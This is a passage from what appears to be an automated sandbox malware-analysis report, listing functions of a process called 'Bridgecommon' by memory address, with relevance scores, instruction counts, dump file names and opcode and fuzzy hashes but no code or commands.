                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction ID: afbd80f9ef0ad0fad0cf1b735c2b400d77d19183b0cef39e93db4313243bea19
                                                                                              • Opcode Fuzzy Hash: f64fda5e2a283c5a6f20f5bc460977e2c33a95fab3921efa84f9000537be349d
                                                                                              • Instruction Fuzzy Hash: 1FE06D6164E7C84FC71AEA748869554BFA0EF6721174A42EFC085CF5A7EA2D8885C701
                                                                                              Function 00007FFD9BB02E49 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction ID: 3d62a0c47176d44997c82c0e1f821f8ab33fecd675541abfaf393db1c4301b03
                                                                                              • Opcode Fuzzy Hash: 6164b1069710f8b3b52f48148b439a8276ab5531142d88090189c8fbc13049d9
                                                                                              • Instruction Fuzzy Hash: F8E06D6164E7C44FCB1AEA758869454BFA0EF6720174A52EEC085CF5A7EA2D8889C701
                                                                                              Function 00007FFD9BB0A0C9 Relevance: 1.3, Strings: 1, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction ID: 89b5110806269fea2bc7528639372eea444baea11129436563572e6916387cf4
                                                                                              • Opcode Fuzzy Hash: 1180c0164a1678c14bbd07de09373b86f6d47de75d9a1041d2375b4828baaeea
                                                                                              • Instruction Fuzzy Hash: 81E09271A0E3C44FC71AEB3488688547F60EE6B21134A42EFC045CF2A7EA2DCC85C701
                                                                                              Function 00007FFD9BAF9359 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: 0092ded93127deea18adf1d4c86615d31208ed26a7bdb0caad6650519258112c
                                                                                              • Instruction ID: 7a38ba0a6d7df1508af04d942fd0bb22f681d1dbef1f3c5f7414117e67c9668c
                                                                                              • Opcode Fuzzy Hash: 0092ded93127deea18adf1d4c86615d31208ed26a7bdb0caad6650519258112c
                                                                                              • Instruction Fuzzy Hash: 92E01A6154F3C44FCB1AEB7488698553F609E6721078B40EEC545CF1B3E62DC949C702
                                                                                              Function 00007FFD9BB0A589 Relevance: 1.3, Strings: 1, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: I
                                                                                              • API String ID: 0-3707901625
                                                                                              • Opcode ID: fbe99245bd64b7fb1acc958f6fb56ff3235aea77a36e13d0b8fd2430e620f844
                                                                                              • Instruction ID: 8556a6a272a9f02e02275a8695d368f96026743ce7064ae58155c101c149d47b
                                                                                              • Opcode Fuzzy Hash: fbe99245bd64b7fb1acc958f6fb56ff3235aea77a36e13d0b8fd2430e620f844
                                                                                              • Instruction Fuzzy Hash: 1FE04F7194A3C44FCB16EB7484A58843F60DE6721078B40EEC145CF1B3E62D8849C701
                                                                                              Function 00007FFD9BAF57E8 Relevance: 1.3, Strings: 1, Instructions: 21COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: M
                                                                                              • API String ID: 0-3664761504
                                                                                              • Opcode ID: 928619a90eee29e8153b7acd52e0a84f2cf2379a01b11201c81d659da177a6f7
                                                                                              • Instruction ID: 7acc7c0abe15c0c2d03acf79adf7aa8d9e272b6b7d0112b34dd9006911854577
                                                                                              • Opcode Fuzzy Hash: 928619a90eee29e8153b7acd52e0a84f2cf2379a01b11201c81d659da177a6f7
                                                                                              • Instruction Fuzzy Hash: C7E0CD75B096854FDF18FA798458454BF80EF6A30574445BCC01BCB197ED29D885C740
                                                                                              Function 00007FFD9BAF9391 Relevance: .3, Instructions: 314COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 713f6486a9e0154efb1148c461cc9bc4c43b39e4f4af55f7eea87e26569bcdde
                                                                                              • Instruction ID: b89b4d50e255b58e1714b369efcf9433eb7679362ef8f79d00f43ab89d0d8575
                                                                                              • Opcode Fuzzy Hash: 713f6486a9e0154efb1148c461cc9bc4c43b39e4f4af55f7eea87e26569bcdde
                                                                                              • Instruction Fuzzy Hash: CBA1A330B18A0D8FEB58EB68C469AB977E1FF98314B114679E01DC72D6DF38E8428741
                                                                                              Function 00007FFD9BB032DD Relevance: .3, Instructions: 279COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d83a04763e8446ec115f17130907d7c8a0eda867b352fd0d563f77fd665f6f7e
                                                                                              • Instruction ID: 03ca3b557abdf82ae0bbc1aea238fc3622e5cca80e63f30cb90b67617205a2d3
                                                                                              • Opcode Fuzzy Hash: d83a04763e8446ec115f17130907d7c8a0eda867b352fd0d563f77fd665f6f7e
                                                                                              • Instruction Fuzzy Hash: D9812721B1DA4E0FEBACEA5884BA6B972C2FF98358F044179D48DC71EBDD28A9454341
                                                                                              Function 00007FFD9BB03365 Relevance: .2, Instructions: 198COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33f95071f0bae8b1ebde37d62b17a3224ef22b0fb77c5f7ead2bf588de4940a7
                                                                                              • Instruction ID: 86162791ee288fe8dd9a464d25b05d95b845ed071236418525417c4fe0369de6
                                                                                              • Opcode Fuzzy Hash: 33f95071f0bae8b1ebde37d62b17a3224ef22b0fb77c5f7ead2bf588de4940a7
                                                                                              • Instruction Fuzzy Hash: 8051F521B1DA4E4FEBACEE6884BA7B972C1FF98358F044179D44DC72EBDD28A9454340
                                                                                              Function 00007FFD9BAD08E8 Relevance: .1, Instructions: 133COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 971072df3818c1190adfef7e00fd846d6c3b0d90dd967b1a3fc5eb4214d020d2
                                                                                              • Instruction ID: 04310598fade5cbe128115e467cd22ffa5b26d210cb805fd209eb1b17dad1cce
                                                                                              • Opcode Fuzzy Hash: 971072df3818c1190adfef7e00fd846d6c3b0d90dd967b1a3fc5eb4214d020d2
                                                                                              • Instruction Fuzzy Hash: 6431043130D9184FDB68EB5CE88A9B977D0EF9932130642BBE48AC7166D911EC828781
                                                                                              Function 00007FFD9BAD0998 Relevance: .1, Instructions: 123COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 000566e7570eba14b5ae2cc4d5763b47442894f3b4e7956266074faae28af8a3
                                                                                              • Instruction ID: c7ae426d55344fe3c8bada1d76b2501564fb6fb38c14d27f38a401dc055c1ed1
                                                                                              • Opcode Fuzzy Hash: 000566e7570eba14b5ae2cc4d5763b47442894f3b4e7956266074faae28af8a3
                                                                                              • Instruction Fuzzy Hash: 00311421B1991D4FE768E77C846A67976C6EF99321B0506BDE40DC32F7EC58AC418240
                                                                                              Function 00007FFD9BB022A8 Relevance: .1, Instructions: 116COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 70ae385aace78c3ac77dba313ee149fc7526b72009db93ec1b2e6f1cae0b4ba6
                                                                                              • Instruction ID: 924a4cd512730696ce7ce9f89b15ff16b9aff3b20d7336bd45e13205e1d67feb
                                                                                              • Opcode Fuzzy Hash: 70ae385aace78c3ac77dba313ee149fc7526b72009db93ec1b2e6f1cae0b4ba6
                                                                                              • Instruction Fuzzy Hash: C531D532A0DA1D4FEB78EA98D4656BD73A1FFA4324F05027BD44DC72D5CD246D458780
                                                                                              Function 00007FFD9BAD119D Relevance: .1, Instructions: 93COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dd646f10209defe21eda456799b45fb97a458937d8461f3d475fd59de47bc13d
                                                                                              • Instruction ID: 2b913dcba2c975ae9dae48ba66b1f90e39b28f80821b175b7dbf81bd74eee18b
                                                                                              • Opcode Fuzzy Hash: dd646f10209defe21eda456799b45fb97a458937d8461f3d475fd59de47bc13d
                                                                                              • Instruction Fuzzy Hash: D4318431B0954E8FDB55EB68C8689BD7BF1FFA5300F0546BAD00DD72A2DA68A940C750
                                                                                              Function 00007FFD9BAD0C25 Relevance: .1, Instructions: 86COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction ID: 8ac27a1720ddaeee308c630b4011d0bf04d2fd96d68048d3572dfe2efbf426f6
                                                                                              • Opcode Fuzzy Hash: a76e692f682c39a097e3af15232d53955c139fef8a18b822a4fbcf7f0492dac8
                                                                                              • Instruction Fuzzy Hash: 0021E736B0D6499FE732E7A898710EC7B60EF92226F4542B3D0588B1E3D9682646C785
                                                                                              Function 00007FFD9BB0C998 Relevance: .1, Instructions: 81COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 31980eebb70c70aa6fb1ba7b3e0e4ef56ff8e5a5a33fe39c6d4f9a482a956696
                                                                                              • Instruction ID: 06554848310c1ad3640082181aabab814f51d2a7a805668c4d378872d02a1932
                                                                                              • Opcode Fuzzy Hash: 31980eebb70c70aa6fb1ba7b3e0e4ef56ff8e5a5a33fe39c6d4f9a482a956696
                                                                                              • Instruction Fuzzy Hash: 4621C232F0491E8BEB64DA58D8547FE73A2FBD4315F018276E409D32D8CE39AA018BD0
                                                                                              Function 00007FFD9BAD1B9F Relevance: .1, Instructions: 79COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction ID: 8ecbdc433f6c6aeabb67a2672d2cfe2d71e1c4d3cbc927a0001d5a233f02f11a
                                                                                              • Opcode Fuzzy Hash: 9a69246afc0d9513fbabed8dda7716bbc8229d182d0b2629a8138c7b5d53fea0
                                                                                              • Instruction Fuzzy Hash: DA216221F0E90E4BEBB4E76884786B86292EFD4711F4643B5D40DC72F2EDB8AE418740
                                                                                              Function 00007FFD9BAE46A4 Relevance: .1, Instructions: 63COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3698397e7c055c92313406de25ae019f2cfb38348dbae7246e18ed0adc3dc11e
                                                                                              • Instruction ID: 35901b599c779f95febc5c7b72bc7f3be15e0d06c20c30564aef8e296fc9b67b
                                                                                              • Opcode Fuzzy Hash: 3698397e7c055c92313406de25ae019f2cfb38348dbae7246e18ed0adc3dc11e
                                                                                              • Instruction Fuzzy Hash: 78112931A0D61D4FEB34DF5498506AB77A5FB86310F02417FE84ED32A6DE78590687D0
                                                                                              Function 00007FFD9BAD0C40 Relevance: .1, Instructions: 51COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction ID: d56f1f7e036786d0397f16634f791572f8b08ee17f2cff34423b0dc15afac97e
                                                                                              • Opcode Fuzzy Hash: cceb765cd7d278859e5b20285bc2b4182da156627d2ad5c52836a51508e7ff97
                                                                                              • Instruction Fuzzy Hash: CD11ED35A0E28C8FE722DBA888701DC7FB0EF92611F4642F7D084DB2A2D9382645C784
                                                                                              Function 00007FFD9BAD0C48 Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction ID: 89880bc378c7becc4a535ebbbe995d79ff760e0672e7c7a9dc768ba78011436e
                                                                                              • Opcode Fuzzy Hash: 9b740f2f91dfb6a78a785e56724a764c0c26b1490b49d3c9c4ecc45a74a28d0a
                                                                                              • Instruction Fuzzy Hash: E501DE35A0E38C9FE722DBA8C86019C7FB0EF82701F4642E7D044DB2A2D9386A44C780
                                                                                              Function 00007FFD9BAD0C50 Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction ID: 4c747736ce06db6f06195de5f38f3eb2660c79216c3e6b300e05bc932a1fe96d
                                                                                              • Opcode Fuzzy Hash: e0c25d66f0bd2f0040109aff44b270d5240011debeea609b5aa75535b5ca2caa
                                                                                              • Instruction Fuzzy Hash: 3A01DF34E0E38D9FE722DBA4887459C7FB0EF56701F5542E7D054DB2A2D9786A44C740
                                                                                              Function 00007FFD9BAD1C2D Relevance: .0, Instructions: 35COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction ID: 04225abf947b6779623892e0e3b1a668b8e5af2c3aceb391021f9c530c4332bb
                                                                                              • Opcode Fuzzy Hash: 72ddf6cd64bb68537bc4cbeb0a6c4be090775de59c5f2517ea9ade3f85775b72
                                                                                              • Instruction Fuzzy Hash: F4F0E134B5981E8AEBB4A754C8647B87362FBD0711F5543F9C00D931A1DEB86A81CB40
                                                                                              Function 00007FFD9BAD0B77 Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction ID: 5afcf77b276a09ab29f865372710c162235bc7af3cbe879b44190248c4e77ad2
                                                                                              • Opcode Fuzzy Hash: 1e558dd8236e8a588d37156f6ebd8144b9593da91a6e1c69f3e2f067ed0d220f
                                                                                              • Instruction Fuzzy Hash: 7BF02B3171EA49CFC742DB38DC999E47F60EF47205BAA15FAC08AC7572C220596ECB41
                                                                                              Function 00007FFD9BB0A4F9 Relevance: .0, Instructions: 33COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fed3e2b23e2ef7b47eb066ba9e75f628470e69cc61e0a571778c4825af1e0a00
                                                                                              • Instruction ID: 6d7a08d5debfa7477c2cdd9bc31398e7de0f1e4dfac1ba0cdef67bc303b7714a
                                                                                              • Opcode Fuzzy Hash: fed3e2b23e2ef7b47eb066ba9e75f628470e69cc61e0a571778c4825af1e0a00
                                                                                              • Instruction Fuzzy Hash: 51F0E521B0D7C80FC72A562948650617FF1CB6B11134A01FFC086C72A3ED58AC858341
                                                                                              Function 00007FFD9BAD1CDA Relevance: .0, Instructions: 30COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bad0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction ID: 5b195def51be91ae4969184ead09916cb35b04be2a8bfae561cac835b3aa5050
                                                                                              • Opcode Fuzzy Hash: ab1761b7cbfcb63ef741ac2f93f71d9567e4b4ef76105488ec604dc97edba527
                                                                                              • Instruction Fuzzy Hash: 98F0D024F0D40E4AEBB4D758C8786B83352EFD0711F5543B5C40D972F5DD786A458640
                                                                                              Function 00007FFD9BB01BE9 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction ID: a0010583900a89edfd703a8e1159066a4fda408acd39631b023e0bab7e7315c7
                                                                                              • Opcode Fuzzy Hash: 7aed316ceae474d060d593c01cb7df5676e94ae54d34ac94682119992c5ea024
                                                                                              • Instruction Fuzzy Hash: AEE09220B197C44FCB0B9A3C48685607FA1EF571057C952EAC046CB1A3E918DC85C742
                                                                                              Function 00007FFD9BB074D5 Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction ID: 343ba5e9e9bb1c9d1940badee7ff9fc5afa3bfd3d09b69df29b991ca14f1d62e
                                                                                              • Opcode Fuzzy Hash: f707c1c7700c84bdc2fa7b8863d9dbcc75505be42f67ee76dfe9e5e855e5aea7
                                                                                              • Instruction Fuzzy Hash: 32E02223F0E6884FE31A0A384C748B43B609F3B22A34F00A7D08ACB6F7D8059D098302
                                                                                              Function 00007FFD9BAE3EB8 Relevance: .0, Instructions: 28COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAE0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bae0000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6423f9a32994c9fa5df0eacea30a6c69e5a69a9e32b4f4fdeb5ceeb97aa0a1a8
                                                                                              • Instruction ID: 4355adbbd43c972decf751e3eb68995ea99a7e288ca72358cf659e8ce7a811e9
                                                                                              • Opcode Fuzzy Hash: 6423f9a32994c9fa5df0eacea30a6c69e5a69a9e32b4f4fdeb5ceeb97aa0a1a8
                                                                                              • Instruction Fuzzy Hash: 05F08231E0851E8BFB19EB84C865ABD73E5FB50310F010679D4269B2E8DEB86A018B80
                                                                                              Function 00007FFD9BAF91A9 Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BAF3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAF3000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9baf3000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction ID: 54494d4839a1049948f64c419503b0db34feda57208a74932c42a1364c45b394
                                                                                              • Opcode Fuzzy Hash: 3d9f8be3ba615e18499f3b8e9abe0a8b87aeeb0acf764803db3cd1d473a39dbc
                                                                                              • Instruction Fuzzy Hash: 33E01A20A497844FCB0AAA3888695503FB1DF6B215B8A00D6C045CB1B3D51DD849C751
                                                                                              Function 00007FFD9BB07D19 Relevance: .0, Instructions: 25COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000037.00000002.2778709297.00007FFD9BB01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BB01000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_55_2_7ffd9bb01000_Bridgecommon.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 525ae91c99862d75867d9db26404daaa026ecb39af5735a8a8152f1b7fb19109
                                                                                              • Instruction ID: 2801a0626bf49da33327d900b299ad47e65a3a1cbe7daae0b93aa7b69d7b4c61
